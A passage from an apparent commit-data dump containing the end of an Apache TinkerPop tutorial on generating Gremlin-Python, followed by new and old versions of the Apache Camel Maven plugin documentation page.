a `Traversal` that will ultimately be evaluated by `RemoteConnection` (e.g. GremlinServer).\nIt is up to the language variant designer to choose a _language driver_ to use for submitting the generated bytecode and\ncoercing its results. The language driver is the means by which, for this example, the CPython\nVM communicates with the JVM.\n\n[source,bash]\n----\n# sudo easy_install pip\n$ pip install gremlinpython\n----\n\nThe Groovy source code below uses Java reflection to generate a Python class that is in 1-to-1 correspondence with\nGremlin-Java.\n\n[source,groovy]\n----\nclass GraphTraversalSourceGenerator {\n\n public static void create(final String graphTraversalSourceFile) {\n\n final StringBuilder pythonClass = new StringBuilder()\n\n pythonClass.append(\"from .traversal import Traversal\\n\")\n pythonClass.append(\"from .traversal import TraversalStrategies\\n\")\n pythonClass.append(\"from .traversal import Bytecode\\n\")\n pythonClass.append(\"from ..driver.remote_connection import RemoteStrategy\\n\")\n pythonClass.append(\"from .. import statics\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ GraphTraversalSource \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\n \"\"\"class GraphTraversalSource(object):\n def __init__(self, graph, traversal_strategies, bytecode=None):\n self.graph = graph\n self.traversal_strategies = traversal_strategies\n if bytecode is None:\n bytecode = Bytecode()\n self.bytecode = bytecode\n def __repr__(self):\n return \"graphtraversalsource[\" + str(self.graph) + \"]\"\n\"\"\")\n GraphTraversalSource.getMethods(). 
\/\/ SOURCE STEPS\n findAll { GraphTraversalSource.class.equals(it.returnType) }.\n findAll {\n !it.name.equals(\"clone\") &&\n !it.name.equals(TraversalSource.Symbols.withRemote)\n }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n source = GraphTraversalSource(self.graph, TraversalStrategies(self.traversal_strategies), Bytecode(self.bytecode))\n source.bytecode.add_source(\"${SymbolHelper.toJava(method)}\", *args)\n return source\n\"\"\")\n }\n pythonClass.append(\n \"\"\" def withRemote(self, remote_connection):\n source = GraphTraversalSource(self.graph, TraversalStrategies(self.traversal_strategies), Bytecode(self.bytecode))\n source.traversal_strategies.add_strategies([RemoteStrategy(remote_connection)])\n return source\n\"\"\")\n GraphTraversalSource.getMethods(). \/\/ SPAWN STEPS\n findAll { GraphTraversal.class.equals(it.returnType) }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n traversal = GraphTraversal(self.graph, self.traversal_strategies, Bytecode(self.bytecode))\n traversal.bytecode.add_step(\"${SymbolHelper.toJava(method)}\", *args)\n return traversal\n\"\"\")\n }\n pythonClass.append(\"\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ GraphTraversal \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\n \"\"\"class GraphTraversal(Traversal):\n def __init__(self, graph, traversal_strategies, bytecode):\n Traversal.__init__(self, graph, traversal_strategies, bytecode)\n def __getitem__(self, index):\n if isinstance(index, int):\n return self.range(index, index + 1)\n elif isinstance(index, slice):\n return self.range(index.start, index.stop)\n else:\n raise TypeError(\"Index must be int or slice\")\n def __getattr__(self, key):\n return self.values(key)\n\"\"\")\n GraphTraversal.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { !it.name.equals(\"clone\") }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" def ${method}(self, *args):\n self.bytecode.add_step(\"${SymbolHelper.toJava(method)}\", *args)\n return self\n\"\"\")\n };\n pythonClass.append(\"\\n\\n\")\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ AnonymousTraversal \/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n pythonClass.append(\"class __(object):\\n\");\n __.class.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { Modifier.isStatic(it.getModifiers()) }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach { method ->\n pythonClass.append(\n \"\"\" @staticmethod\n def ${method}(*args):\n return GraphTraversal(None, None, Bytecode()).${method}(*args)\n\"\"\")\n };\n pythonClass.append(\"\\n\\n\")\n \/\/ add to gremlin.python.statics\n __.class.getMethods().\n findAll { GraphTraversal.class.equals(it.returnType) }.\n findAll { Modifier.isStatic(it.getModifiers()) }.\n findAll { !it.name.equals(\"__\") }.\n collect { SymbolHelper.toPython(it.name) }.\n unique().\n sort { a, b -> a <=> b }.\n forEach {\n pythonClass.append(\"def ${it}(*args):\\n\").append(\" return __.${it}(*args)\\n\\n\")\n pythonClass.append(\"statics.add_static('${it}', ${it})\\n\\n\")\n }\n pythonClass.append(\"\\n\\n\")\n\n\/\/ save to a python file\n final File 
file = new File(graphTraversalSourceFile);\n file.delete()\n pythonClass.eachLine { file.append(it + \"\\n\") }\n }\n}\n----\n\nWhen the above Groovy script is evaluated (e.g. in the Gremlin Console), **Gremlin-Python** is born. The generated Python\nfile is available at link:https:\/\/github.com\/apache\/tinkerpop\/blob\/x.y.z\/gremlin-python\/src\/main\/jython\/gremlin_python\/process\/graph_traversal.py[graph_traversal.py].\nIt is important to note that there is a bit more to Gremlin-Python: there also exist Python implementations of `TraversalStrategies`, `Traversal`, `Bytecode`, etc.\nPlease review the full implementation of Gremlin-Python link:https:\/\/github.com\/apache\/tinkerpop\/tree\/x.y.z\/gremlin-python\/src\/main\/jython\/gremlin_python[here].\n\nNOTE: In practice, TinkerPop uses Groovy's `GStringTemplateEngine` to help with the code generation task described\nabove and automates that generation as part of the standard build with Maven using the `gmavenplus-plugin`. See the\n`gremlin-python` link:https:\/\/github.com\/apache\/tinkerpop\/blob\/x.y.z\/gremlin-python\/pom.xml[pom.xml] for more details.\n\nOf particular importance is Gremlin-Python's implementation of `Bytecode`.\n\n[source,python]\n----\nclass Bytecode(object):\n    def __init__(self, bytecode=None):\n        self.source_instructions = []\n        self.step_instructions = []\n        self.bindings = {}\n        if bytecode is not None:\n            self.source_instructions = list(bytecode.source_instructions)\n            self.step_instructions = list(bytecode.step_instructions)\n\n    def add_source(self, source_name, *args):\n        newArgs = ()\n        for arg in args:\n            newArgs = newArgs + (self.__convertArgument(arg),)\n        self.source_instructions.append((source_name, newArgs))\n        return\n\n    def add_step(self, step_name, *args):\n        newArgs = ()\n        for arg in args:\n            newArgs = newArgs + (self.__convertArgument(arg),)\n        self.step_instructions.append((step_name, newArgs))\n        return\n\n    def __convertArgument(self, arg):\n        if isinstance(arg, Traversal):\n            self.bindings.update(arg.bytecode.bindings)\n            return arg.bytecode\n        elif isinstance(arg, tuple) and 2 == len(arg) and isinstance(arg[0], str):\n            self.bindings[arg[0]] = arg[1]\n            return Binding(arg[0], arg[1])\n        else:\n            return arg\n----\n\nAs `GraphTraversalSource` and `GraphTraversal` are manipulated, the step-by-step instructions are written to `Bytecode`.\nThis bytecode is simply a list of lists.\n\n
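To make this concrete, here is a minimal, hand-driven sketch (hypothetical driver code, not part of the library) that exercises the `Bytecode` class shown above. In real Gremlin-Python these calls are issued by the generated `GraphTraversalSource` and `GraphTraversal` methods, and the sketch assumes the `gremlin_python` package is importable so that the `Traversal` and `Binding` types referenced by `__convertArgument` resolve.\n\n[source,python]\n----\n# Drive the Bytecode class shown above by hand.\nbytecode = Bytecode()\nbytecode.add_source(\"withComputer\")  # a source instruction with no arguments\nbytecode.add_step(\"V\", 1)            # a spawn step with one argument\nbytecode.add_step(\"out\", \"knows\")    # a traversal step with one argument\nprint(bytecode.source_instructions)  # [('withComputer', ())]\nprint(bytecode.step_instructions)    # [('V', (1,)), ('out', ('knows',))]\n----\n\n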
For instance, `g.V(1).repeat(out('knows').hasLabel('person')).times(2).name` has\nthe `Bytecode` form:\n\n[source,json]\n----\n[\n  [\"V\", [1]],\n  [\"repeat\", [[\n    [\"out\", [\"knows\"]],\n    [\"hasLabel\", [\"person\"]]]]],\n  [\"times\", [2]],\n  [\"values\", [\"name\"]]\n]\n----\n\nThis nested list representation is ultimately converted by the language variant into link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#graphson-reader-writer[GraphSON]\nfor serialization to a `RemoteConnection` such as GremlinServer.\n\n[source,bash]\n----\n$ bin\/gremlin-server.sh install org.apache.tinkerpop gremlin-python x.y.z\n$ bin\/gremlin-server.sh conf\/gremlin-server-modern-py.yaml\n[INFO] GremlinServer -\n         \\,,,\/\n         (o o)\n---oOOo-(3)-oOOo---\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-modern-py.yaml\n[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics\n[INFO] GraphManager - Graph [graph] was successfully configured via [conf\/tinkergraph-empty.properties].\n[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*\n[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.\n[INFO] Logger - 56 attributes loaded from 90 stream(s) in 21ms, 56 saved, 1150 ignored: [\"Ant-Version\", \"Archiver-Version\", \"Bnd-LastModified\", \"Boot-Class-Path\", \"Build-Jdk\", \"Build-Version\", \"Built-By\", \"Bundle-Activator\", \"Bundle-BuddyPolicy\", \"Bundle-ClassPath\", \"Bundle-Description\", \"Bundle-DocURL\", \"Bundle-License\", \"Bundle-ManifestVersion\", \"Bundle-Name\", \"Bundle-RequiredExecutionEnvironment\", \"Bundle-SymbolicName\", \"Bundle-Vendor\", \"Bundle-Version\", \"Can-Redefine-Classes\", \"Created-By\", \"DynamicImport-Package\", \"Eclipse-BuddyPolicy\", \"Export-Package\", \"Extension-Name\", \"Extension-name\", \"Fragment-Host\", \"Gremlin-Plugin-Dependencies\", \"Ignore-Package\", \"Implementation-Build\", \"Implementation-Title\", \"Implementation-URL\", \"Implementation-Vendor\", \"Implementation-Vendor-Id\", \"Implementation-Version\", \"Import-Package\", \"Include-Resource\", \"JCabi-Build\", \"JCabi-Date\", \"JCabi-Version\", \"Main-Class\", \"Main-class\", \"Manifest-Version\", \"Originally-Created-By\", \"Package\", \"Private-Package\", \"Require-Capability\", \"Specification-Title\", \"Specification-Vendor\", \"Specification-Version\", \"Tool\", \"Url\", \"X-Compile-Source-JDK\", \"X-Compile-Target-JDK\", \"hash\", \"version\"]\n[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]\n[INFO] OpLoader - Adding the standard OpProcessor.\n[INFO] OpLoader - Adding the session OpProcessor.\n[INFO] OpLoader - Adding the traversal OpProcessor.\n[INFO] TraversalOpProcessor - Initialized cache for TraversalOpProcessor with size 1000 and expiration time of 600000 ms\n[INFO] GremlinServer - Executing start up LifeCycleHook\n[INFO] Logger$info - Executed once at startup of Gremlin Server.\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v3.0+json with 
org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0\n[INFO] AbstractChannelizer - Configured application\/json with org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV3d0\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 4 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nWithin the CPython console, it is possible to evaluate the following.\n\n[source,python]\n----\nPython 2.7.2 (default, Oct 11 2012, 20:14:37)\n[GCC 4.2.1 Compatible Apple Clang 4.0 (tags\/Apple\/clang-418.0.60)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> from gremlin_python import statics\n>>> from gremlin_python.structure.graph import Graph\n>>> from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection\n# loading statics enables __.out() to be out() and P.gt() to be gt()\n>>> statics.load_statics(globals())\n>>> graph = Graph()\n>>> g = graph.traversal().withRemote(DriverRemoteConnection('ws:\/\/localhost:8182\/gremlin','g'))\n# nested traversal with Python slicing and attribute interception extensions\n>>> g.V().hasLabel(\"person\").repeat(both()).times(2).name[0:2].toList()\n[u'marko', u'marko']\n>>> g = g.withComputer()\n>>> g.V().hasLabel(\"person\").repeat(both()).times(2).name[0:2].toList()\n[u'peter', u'peter']\n# a complex, nested multi-line traversal\n>>> g.V().match( \\\n... as_(\"a\").out(\"created\").as_(\"b\"), \\\n... as_(\"b\").in_(\"created\").as_(\"c\"), \\\n... as_(\"a\").out(\"knows\").as_(\"c\")). \\\n... select(\"c\"). \\\n... union(in_(\"knows\"),out(\"created\")). \\\n... name.toList()\n[u'ripple', u'marko', u'lop']\n>>>\n----\n\nIMPORTANT: Learn more about Apache TinkerPop's distribution of Gremlin-Python link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#gremlin-python[here].\n\n[[gremlin-language-variant-conventions]]\n== Gremlin Language Variant Conventions\n\nEvery programming language is different and a Gremlin language variant must ride the fine line between leveraging the\nconventions of the host language and ensuring consistency with Gremlin-Java. A collection of conventions for navigating\nthis dual-language bridge is provided.\n\n* If camelCase is not an accepted method naming convention in the host language, then the host language's convention can be used instead. For instance, in a Gremlin-Ruby implementation, `outE(\"created\")` may be `out_e(\"created\")`.\n* If Gremlin-Java step names conflict with the host language's reserved words, then a consistent amelioration should be used. For instance, in Python `as` is a reserved word; thus, Gremlin-Python uses `as_`.\n* If the host language does not use dot-notation for method chaining, then its method chaining convention should be used instead of going the route of operator overloading. For instance, a Gremlin-PHP implementation should do `$g->V()->out()`.\n* If a programming language does not support method overloading, then varargs and type introspection should be used. In Gremlin-Python, `*args` does just that.\n\n== Conclusion\n\nGremlin is a simple language because it uses two fundamental programming language constructs: *function composition*\nand *function nesting*. Because of this foundation, it is relatively easy to implement Gremlin in any modern programming\nlanguage. Two ways of doing this for the Python language were presented in this tutorial: one using Jython (on the JVM) and one using CPython.\n\n
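As a closing illustration, the two constructs look like this in Gremlin-Python (a hypothetical sketch, assuming a `GraphTraversalSource` named `g` and that `statics.load_statics(globals())` has been called, as in the console session above):\n\n[source,python]\n----\n# Function composition: steps chained left to right.\ng.V().out(\"knows\").values(\"name\")\n\n# Function nesting: an anonymous traversal passed as a step argument.\ng.V().repeat(out(\"knows\")).times(2).values(\"name\")\n----\n\n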
It is strongly recommended that language variant designers leverage (especially when not on the JVM)\nthe reflection-based source code generation technique presented. This method ensures that the language\nvariant is always in sync with the corresponding Apache TinkerPop Gremlin-Java release version. Moreover, it reduces\nthe chance of missing methods or creating poorly implemented methods. While Gremlin is simple, there are nearly 200\nsteps in `GraphTraversal`. As such, mechanical means of host language embedding are strongly advised.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e9925e60ec3f1295e0f260118ca7aa6224936bf","subject":"Regen for commit 821adb8cc121dfdace94f20bf36346dbfb51b6bb (#7895)","message":"Regen for commit 821adb8cc121dfdace94f20bf36346dbfb51b6bb (#7895)\n\nSigned-off-by: GitHub <1505422b2465e9a84f6fdfaa161078890c593f06@github.com>\r\n\r\nCo-authored-by: davsclaus <3cabd045dd8d3287ff6fd2a2e637a44e01b67029@users.noreply.github.com>","repos":"cunningt\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,christophd\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,apache\/camel,apache\/camel,christophd\/camel,christophd\/camel,apache\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-maven-plugin.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-maven-plugin.adoc","new_contents":"= Camel Maven Plugin\n\nThe Camel Maven Plugin supports the following goals\n\n - camel:run - To run your Camel application\n - camel:dev - To run your Camel application in developer mode\n - camel:debug - To run your Camel application in debug mode\n - camel:prepare-fatjar - To prepare your Camel application for being packaged as a fat-jar (such as by maven-assembly-plugin)\n\n== camel:run\n\nThe `camel:run` goal of the Camel Maven Plugin is used to run your Camel Spring configurations in a forked JVM from Maven.\nA good example application to get you started is the Spring Example.\n\n----\ncd examples\/camel-example-spring\nmvn camel:run\n----\n\nThis makes it very easy to spin up and test your routing rules without having to write a main(...) method;\nit also lets you create multiple jars to host different sets of routing rules and easily test them independently.\n\nHow this works is that the plugin will compile the source code in the maven project,\nthen boot up a Spring ApplicationContext using the XML configuration files on the classpath at `META-INF\/spring\/*.xml`\n\nIf you want to boot up your Camel routes a little faster, you could try the `camel:embedded` instead.\n\n=== Options\n\nThe maven plugin *run* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| duration | -1 | Sets the time duration (seconds) that the application will run for before terminating. A value <= 0 will run forever.\n| durationIdle | -1 | Sets the idle time duration (seconds) duration that the application can be idle before terminating. 
A value <= 0 will run forever.\n| durationMaxMessages | -1 | Sets the maximum number of messages that the application will process before terminating.\n| logClasspath | false | Whether to log the classpath when starting.\n| loggingLevel | OFF | Whether to use built-in console logging (uses log4j), which does not require adding any logging dependency to your project. However, the logging is fixed to log to the console, with a color style that is similar to Spring Boot. You can change the root logging level to: FATAL, ERROR, WARN, INFO, DEBUG, TRACE, OFF\n|===\n\n\n=== Running OSGi Blueprint\n\nUse the `camel-karaf-maven-plugin`, which is intended for Apache Camel on Karaf\/OSGi.\n\n=== Running CDI\n\nThe `camel:run` plugin also supports running a CDI application.\n\nThis allows you to boot up any CDI services you wish - whether they are Camel-related, or any other CDI-enabled services.\nYou should add the CDI container of your choice (e.g. Weld or OpenWebBeans) to the dependencies of the camel-maven-plugin such as in this example.\n\nFrom the source of Camel you can run a CDI example via:\n\n----\ncd examples\/camel-example-cdi\nmvn compile camel:run\n----\n\n=== Logging the classpath\n\nYou can configure whether the classpath should be logged when `camel:run` executes.\nYou can enable this in the configuration using:\n\n[source,xml]\n----\n<plugin>\n  <groupId>org.apache.camel<\/groupId>\n  <artifactId>camel-maven-plugin<\/artifactId>\n  <configuration>\n    <logClasspath>true<\/logClasspath>\n  <\/configuration>\n<\/plugin>\n----\n\n=== Using built-in logging\n\nIf you quickly want logging to the console, you can use the built-in logging by setting the logging level as shown:\n\n[source,xml]\n----\n<plugin>\n  <groupId>org.apache.camel<\/groupId>\n  <artifactId>camel-maven-plugin<\/artifactId>\n  <configuration>\n    <loggingLevel>INFO<\/loggingLevel>\n  <\/configuration>\n<\/plugin>\n----\n\nThis runs the application with console logging, in a color style that is similar to Spring Boot logging.\nThis is turned off by default, so that the logging system configured in the project is used.\n\nThe idea with the built-in logging is that you sometimes want to avoid messing with setting\nup logging, and just want a quick and easy log to the console that looks good.\n\n\n== camel:dev\n\nThe `camel:dev` goal is an extension to `camel:run` that runs the Camel application in developer mode.\nIn this mode, among other things, Camel uses hot-reloading of DSL routes (XML, YAML and Java) that are located in\nthe `src\/main\/resources` directory.\n\n=== Options\n\nThe Maven plugin *dev* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| routesDirectory | src\/main\/resources | The directory to watch for file changes, which trigger a live reload of the Camel routes on-the-fly.\n| duration | -1 | Sets the time duration (seconds) that the application will run for before terminating. A value <= 0 will run forever.\n| durationIdle | -1 | Sets the idle time duration (seconds) that the application can be idle before terminating. 
A value <= 0 will run forever.\n| durationMaxMessages | -1 | Sets the maximum number of messages that the application will process before terminating.\n| logClasspath | false | Whether to log the classpath when starting.\n| loggingLevel | OFF | Whether to use built-in console logging (uses log4j), which does not require adding any logging dependency to your project. However, the logging is fixed to log to the console, with a color style that is similar to Spring Boot. You can change the root logging level to: FATAL, ERROR, WARN, INFO, DEBUG, TRACE, OFF\n|===\n\n== camel:debug\n\nThe `camel:debug` goal is an extension to `camel:dev` that runs the Camel application in debug mode, which allows you to debug the Camel routes with the Camel textual route debugger.\n\n=== Options\n\nThe Maven plugin *debug* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| suspend | true | Indicates whether the message processing done by Camel should be suspended as long as a debugger is not attached.\n|===\n\n== camel:prepare-fatjar\n\nThe `camel:prepare-fatjar` goal of the Camel Maven Plugin is used to prepare your Camel application\nfor being packaged as a _fat jar_. The goal scans the Maven dependencies to discover Camel JARs and\nextracts any type converters they provide, which get merged together into a single _uber_ file stored\nin `target\/classes\/META-INF\/services\/org\/apache\/camel\/UberTypeConverterLoader`.\n\nThis _uber_ loader file contains all the combined type converters the Camel application uses at runtime.\nThey are merged together into this single file.\n\nThis is needed as otherwise the _fat jar_ Maven plugins (such as maven-assembly-plugin, or maven-shade-plugin)\ncause the `TypeConverterLoader` files to be overwritten in the assembled JAR, which prevents some type converters\nfrom being loaded by Camel.\n\nThe `UberTypeConverterLoader` ensures that all type converters get loaded, as this file contains all the known\ntype converter files.\n\nTo use this goal, you can add the following to your Camel application `pom.xml` file:\n\n[source,xml]\n----\n  <build>\n    <plugins>\n      <plugin>\n        <groupId>org.apache.camel<\/groupId>\n        <artifactId>camel-maven-plugin<\/artifactId>\n        <version>${camel.version}<\/version>\n        <executions>\n          <execution>\n            <goals>\n              <goal>prepare-fatjar<\/goal>\n            <\/goals>\n          <\/execution>\n        <\/executions>\n      <\/plugin>\n    <\/plugins>\n  <\/build>\n----\n\nFor example, to use this with the `maven-assembly-plugin`, you can do as below.\nRemember to specify the class name of *your* main class where it says `com.foo.NameOfMainClass`:\n\n[source,xml]\n----\n  <build>\n    <plugins>\n      <plugin>\n        <groupId>org.apache.camel<\/groupId>\n        <artifactId>camel-maven-plugin<\/artifactId>\n        <version>${camel.version}<\/version>\n        <executions>\n          <execution>\n            <goals>\n              <goal>prepare-fatjar<\/goal>\n            <\/goals>\n          <\/execution>\n        <\/executions>\n      <\/plugin>\n      <plugin>\n        <groupId>org.apache.maven.plugins<\/groupId>\n        <artifactId>maven-assembly-plugin<\/artifactId>\n        <configuration>\n          <archive>\n            <manifest>\n              <mainClass>com.foo.NameOfMainClass<\/mainClass>\n            <\/manifest>\n          <\/archive>\n        <\/configuration>\n      <\/plugin>\n    <\/plugins>\n  <\/build>\n----\n","old_contents":"= Camel Maven Plugin\n\nThe Camel Maven Plugin supports the following goals\n\n - camel:run - To run your Camel application\n - camel:dev - To run your Camel application in developer 
mode\n - camel:prepare-fatjar - To prepare your Camel application for being packaged as a fat-jar (such as by maven-assembly-plugin)\n\n== camel:run\n\nThe `camel:run` goal of the Camel Maven Plugin is used to run your Camel Spring configurations in a forked JVM from Maven.\nA good example application to get you started is the Spring Example.\n\n----\ncd examples\/camel-example-spring\nmvn camel:run\n----\n\nThis makes it very easy to spin up and test your routing rules without having to write a main(...) method;\nit also lets you create multiple jars to host different sets of routing rules and easily test them independently.\n\nHow this works is that the plugin will compile the source code in the maven project,\nthen boot up a Spring ApplicationContext using the XML configuration files on the classpath at `META-INF\/spring\/*.xml`\n\nIf you want to boot up your Camel routes a little faster, you could try the `camel:embedded` instead.\n\n=== Options\n\nThe maven plugin *run* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| duration | -1 | Sets the time duration (seconds) that the application will run for before terminating. A value <= 0 will run forever.\n| durationIdle | -1 | Sets the idle time duration (seconds) duration that the application can be idle before terminating. A value <= 0 will run forever.\n| durationMaxMessages | -1 | Sets the duration of maximum number of messages that the application will process before terminating.\n| logClasspath | false | Whether to log the classpath when starting\n| loggingLevel | OFF | Whether to use built-in console logging (uses log4j), which does not require to add any logging dependency to your project. However, the logging is fixed to log to the console, with a color style that is similar to Spring Boot. You can change the root logging level to: FATAL, ERROR, WARN, INFO, DEBUG, TRACE, OFF\n|===\n\n\n=== Running OSGi Blueprint\n\nUse the `camel-karaf-maven-plugin` which is intended for Apache Camel on Karaf\/OSGi.\n\n=== Running CDI\n\nThe `camel:run` plugin also supports running a CDI application\n\nThis allows you to boot up any CDI services you wish - whether they are Camel-related, or any other CDI enabled services.\nYou should add the CDI container of your choice (e.g. 
Weld or OpenWebBeans) to the dependencies of the camel-maven-plugin such as in this example.\n\nFrom the source of Camel you can run a CDI example via\n\n----\ncd examples\/camel-example-cdi\nmvn compile camel:run\n----\n\n=== Logging the classpath\n\nYou can configure whether the classpath should be logged when `camel:run` executes.\nYou can enable this in the configuration using:\n\n[source,xml]\n----\n<plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <configuration>\n <logClasspath>true<\/logClasspath>\n <\/configuration>\n<\/plugin>\n----\n\n=== Using built-in logging\n\nIf you want quickly to have logging to console, you can use the built-in logging by setting the logging level as shown:\n\n[source,xml]\n----\n<plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <configuration>\n <loggingLevel>INFO<\/loggingLevel>\n <\/configuration>\n<\/plugin>\n----\n\nThis runs the application with console logging, in color that is similar to Spring Boot logging.\nThis is default turned off, to use the configured logging system in the project.\n\nThe idea with the built-in logging is that you sometimes want to avoid messing with setting\nup logging, and just want a quick and easy log to console that looks good.\n\n\n== camel:dev\n\nThe `camel:dev` is an extension to `camel:run` to run the Camel application in developer mode.\nIn this mode, among others, Camel will use hot-reloading of DSL routes (xml, yaml and java) that are located from\nthe `src\/main\/resources` directory.\n\n=== Options\n\nThe maven plugin *dev* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| routesDirectory | src\/main\/resources | To watch the directory for file changes which triggers a live reload of the Camel routes on-the-fly.\n| duration | -1 | Sets the time duration (seconds) that the application will run for before terminating. A value <= 0 will run forever.\n| durationIdle | -1 | Sets the idle time duration (seconds) duration that the application can be idle before terminating. A value <= 0 will run forever.\n| durationMaxMessages | -1 | Sets the duration of maximum number of messages that the application will process before terminating.\n| logClasspath | false | Whether to log the classpath when starting\n| loggingLevel | OFF | Whether to use built-in console logging (uses log4j), which does not require to add any logging dependency to your project. However, the logging is fixed to log to the console, with a color style that is similar to Spring Boot. 
You can change the root logging level to: FATAL, ERROR, WARN, INFO, DEBUG, TRACE, OFF\n|===\n\n== camel:debug\n\nThe `camel:debug` is an extension to `camel:dev` to run the Camel application in debug mode which allows to debug the Camel routes thanks to the Camel textual route debugger.\n\n=== Options\n\nThe maven plugin *debug* goal supports the following options which can be configured from the command line (use `-D` syntax), or defined in the `pom.xml` file in the `<configuration>` tag.\n\n|===\n| Parameter | Default Value | Description\n| suspend | true | Indicates whether the message processing done by Camel should be suspended as long as a debugger is not attached.\n|===\n\n== camel:prepare-fatjar\n\nThe `camel:prepare-fatjar` goal of the Camel Maven Plugin is used to prepare your Camel application\nfor being packaged as a _fat jar_. The goal scans the Maven dependencies to discover Camel JARs and\nextract if they have type converters, which gets merged together into a single _uber_ file stored\nin `target\/classes\/META-INF\/services\/org\/apache\/camel\/UberTypeConverterLoader`.\n\nThis _uber_ loader file contains all the combined type converters the Camel application uses at runtime.\nThey are merged together into this single file.\n\nThis is needed as otherwise the _fat jar_ maven plugins (such as maven-assembly-plugin, or maven-shade-plugin)\ncauses the `TypeConverterLoader` files to be overwritten in the assembled JAR which causes not all type converters\nto be loaded by Camel.\n\nThe `UberTypeConverterLoader` ensures they all type converters gets loaded as this file contains all the known\ntype converter files.\n\nTo use this goal, you can add the following to your Camel application `pom.xml` file:\n\n[source,xml]\n----\n <build>\n <plugins>\n <plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <version>${camel.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>prepare-fatjar<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <\/plugins>\n <\/build>\n----\n\nFor example to use this with the `maven-assembly-plugin` you can do as below.\nRemember to specify the class name of *your* main class where it says `com.foo.NameOfMainClass`:\n\n[source,xml]\n----\n <build>\n <plugins>\n <plugin>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-maven-plugin<\/artifactId>\n <version>${camel.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>prepare-fatjar<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n <plugin>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-assembly-plugin<\/artifactId>\n <configuration>\n <archive>\n <manifest>\n <mainClass>com.foo.NameOfMainClass<\/mainClass>\n <\/manifest>\n <\/archive>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n <\/build>\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2d098f6e2318060572fa2becdef4ee32fbd3a29","subject":"Update 2015-08-11-Un-peu-de-pratique.adoc","message":"Update 